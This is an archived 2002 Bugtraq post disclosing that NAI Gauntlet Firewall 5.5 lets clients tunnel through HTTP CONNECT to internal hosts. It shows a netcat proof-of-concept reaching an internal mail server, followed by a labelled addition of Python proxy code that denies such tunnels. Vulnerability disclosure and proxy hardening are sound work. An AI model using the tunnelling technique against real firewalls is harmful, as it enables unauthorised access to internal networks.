NAI Gauntlet Firewall 5.5 for NT (Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id 4131))

From: Rashed Alabbar (rashed.alabbar@datafort.net)
Date: 02/28/02


From: "Rashed Alabbar" <rashed.alabbar@datafort.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 28 Feb 2002 18:33:26 +0400

Hi all,

    I found some vulnerabilities on the NAI Gauntlet Firewall 5.5 on NT
4. These vulnerabilities were found in other firewalls, specifically
proxy firewalls, and I tried them on the Gauntlet, and it worked.

I don't know if this was published earlier or not, but here it goes:

Vulnerability:
- Multiple Vendor HTTP CONNECT TCP Tunnel Vulnerability (bugtraq id
4131)

Examples: (I'm using Volker Tanger [volker.tanger@discon.de]'s email:
"CheckPoint FW1 HTTP Security Hole" example as a template for my
example)

Client = x.x.x.x
Gauntlet = y.y.y.y
Internal Mailserver = z.z.z.z

nc -v -n y.y.y.y 80
(UNKNOWN) [y.y.y.y] 80 (?) open
CONNECT z.z.z.z:25 HTTP/1.0

HTTP/1.0 200 OK

mail server banner

That's it!

Rashed Alabbar
Engineer\ Security Management and Operations
Security Operations Center
Data Fort - Total Security Solutions
Dubai Internet City
P.O. Box: 500006, Dubai, United Arab Emirates
Email: rashed.alabbar@datafort.net
http://www.datafort.net
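
Added example, not part of the original post and not vendor code: a sketch of the check an HTTP proxy can apply to CONNECT requests so that a request like the one in the transcript above is refused instead of answered with "200 OK". The port allowlist, the protected network ranges and the sample addresses are assumptions constructed for illustration.

```python
import ipaddress

# Assumed policy (not from the post): tunnels only to TLS ports, and never to
# addresses on the protected side of the firewall.
ALLOWED_PORTS = {443}
PROTECTED_NETS = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                   "127.0.0.0/8", "169.254.0.0/16")]

def check_connect(request_line):
    """Return (allowed, reason) for one HTTP request line seen by the proxy."""
    parts = request_line.strip().split()
    if len(parts) != 3 or parts[0].upper() != "CONNECT":
        return (True, "not a CONNECT request")
    host, sep, port = parts[1].rpartition(":")
    if not sep or not (port.isascii() and port.isdigit()):
        return (False, "malformed CONNECT target")
    if int(port) not in ALLOWED_PORTS:
        return (False, f"port {port} not allowed for tunnels")
    try:
        addr = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        # Hostname target: a real proxy must repeat the address check on
        # whatever the name resolves to before opening the tunnel.
        return (True, "hostname target, port allowed")
    if any(addr in net for net in PROTECTED_NETS):
        return (False, f"{addr} is a protected internal address")
    return (True, "tunnel allowed")

# Constructed sample request lines; 10.0.0.25 stands in for z.z.z.z.
SAMPLES = [
    "CONNECT 10.0.0.25:25 HTTP/1.0",         # shape of the request in the post
    "CONNECT 10.0.0.25:443 HTTP/1.0",        # allowed port, internal target
    "CONNECT www.example.com:443 HTTP/1.1",  # ordinary HTTPS tunnel
    "GET / HTTP/1.0",                        # not a tunnel request
]

if __name__ == "__main__":
    for line in SAMPLES:
        allowed, reason = check_connect(line)
        print(f"{'ALLOW' if allowed else 'DENY ':5}  {line}  ({reason})")
```

The same function can be run over the request-line field of existing proxy logs to find tunnels that were already granted to non-TLS ports or internal addresses.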